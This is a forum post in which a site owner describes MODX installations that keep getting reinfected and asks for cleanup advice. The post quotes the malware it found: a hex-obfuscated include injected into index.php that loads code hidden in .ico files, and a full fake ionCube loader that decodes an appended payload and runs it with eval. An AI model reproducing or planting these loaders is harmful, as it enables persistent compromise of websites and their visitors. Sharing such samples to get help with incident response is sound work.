After hours and hours of reading and trial and error I'm out of options.
Installation info:
- MODX version: 2.6.1
- PHP version: 5.6.33
- DB info: mysql, version: 10.0.29-MariaDB-cll-lve
My MODX installations keeps getting compromised.
Malicious code is injected in certain index.php files. Example:
/*3e166*/
@include "\x2fho\x6de/\x64eb\x3950\x391/\x64om\x61in\x73/m\x69dd\x65lb\x75rg\x67ez\x69ch\x74va\x6ede\x73ta\x64.n\x6c/p\x75bl\x69c_\x68tm\x6c/a\x73se\x74s/\x63om\x70on\x65nt\x73/r\x65ca\x70tc\x68av\x32/f\x61vi\x63on\x5f20\x324c\x36.i\x63o";
/*3e166*/
The includes are referring to ICO files, which contain scrambled code.
Besides this, the hack also creates new, random, files, like:
ucwuwapz.php
footer21.php
vexwzlkn.php
Contents of footer21.php (similar to the other files):
<?php //000310
if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0x99d-0x4ed)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;
?>
2473S6D9I7X66E568X20S3d2041Z7D2726179S2827776V8C7a7Oa746dI2V73d3e277aL6Ga6T1
65H6H8O64T272D9D3b2472T6Lc64O772G0H3GdH20417L27A26A1792W82T7N686Pf7979H2N73
DdT3e2E76dF6Xe6D7706fC272M93b666Hf72K65P6Q1636Q82028T41727S261I7M92824736J9
7U66A5Q6U82Ec20245LfQ504Wf5354K2c2024L7Q2Y6c6477D2c20R2S45f43B4VfC4fO4Eb494
52S920P617Y3A20247275Z7475D2W9207Pb6B66VfD7B26H56R163Y682V02M82N4727T57P4I7
G520K6P1732L02479666bW6Y5W6Bf203d3e2024V646R8X6I776R2L92L0M7Mb24646O8X6776C
2C0Q3Vd2Q040F70L6163X6b28T22T4W8Z2aU222XcW2B02464686B776293Db24Y796N66b6G56
fP202e3dS2K022S32L663430Q3E861G63632dU626566612Td3432X3C733G2dT393P038642Rd
N3F5U63I3A833V33W6D5Z62663534N35O31223b24H657Va6bD6aJ78203Fd2G0W24646867F7S
6F205e2O07T37S56N27374A7P22T8B7374V72O5f7Y2S6C5V706561C742824M79Q6H66b656f2
BcN202V873M7472L6c65U6e28X24646867O7629202f2073747B26Hc656e2H8E2H4Z796F6D6b
G65C6f29Q29V2A02Gb2D0I312Z9Z2c2T0302c20737L472U6c6E56e28A24H646V8M6N776292N
93bW24L657a6b6aD78D20W3dX206578706cB6Lf64652P8E2D223222Vc2Q024X657a6PbR6aI7
829G3bM69662028B6B36Uf75B6Ie7428W24U6K5M7a6NbU6a78Z29203Fd3dJ20P332Z920W7b6
5D76A61S6cE28C24657DaN6b6a785Hb3W15dO28F2P4Y657a6bM6aU78B5bX325d292V9M3b657
O8J6974O282J93bV7dA7d7d
Another practical problem is that MODX sites that are infected, will stop working after a while.
I did all the standard stuff and followed the excellent guide at
https://forums.modx.com/thread/94643/how-to-clean-up-your-hacked-webspace
- Checked for malicious plugins/users
- Changed all passwords, form MODX users to DirectAdmin/FTP/DB
- Moved the website to a new hosting account
- Used the guide mentioned earlier to identify malicious includes via SSH
Unfortunately this will only temporarily remove the infection.
Right now the only thing I can do is running a cronjob that removes all unwanted ICO files form my host every hour...
I'm not sure if this is a specific MODX related infection. The truth is that only MODX-installations are affected right now.
Is there someone who experienced the same problems and found a solution? Any advice is welcome!
Thanks in advance..
[ed. note: hartmanrik last edited this post 6 years, 1 month ago.]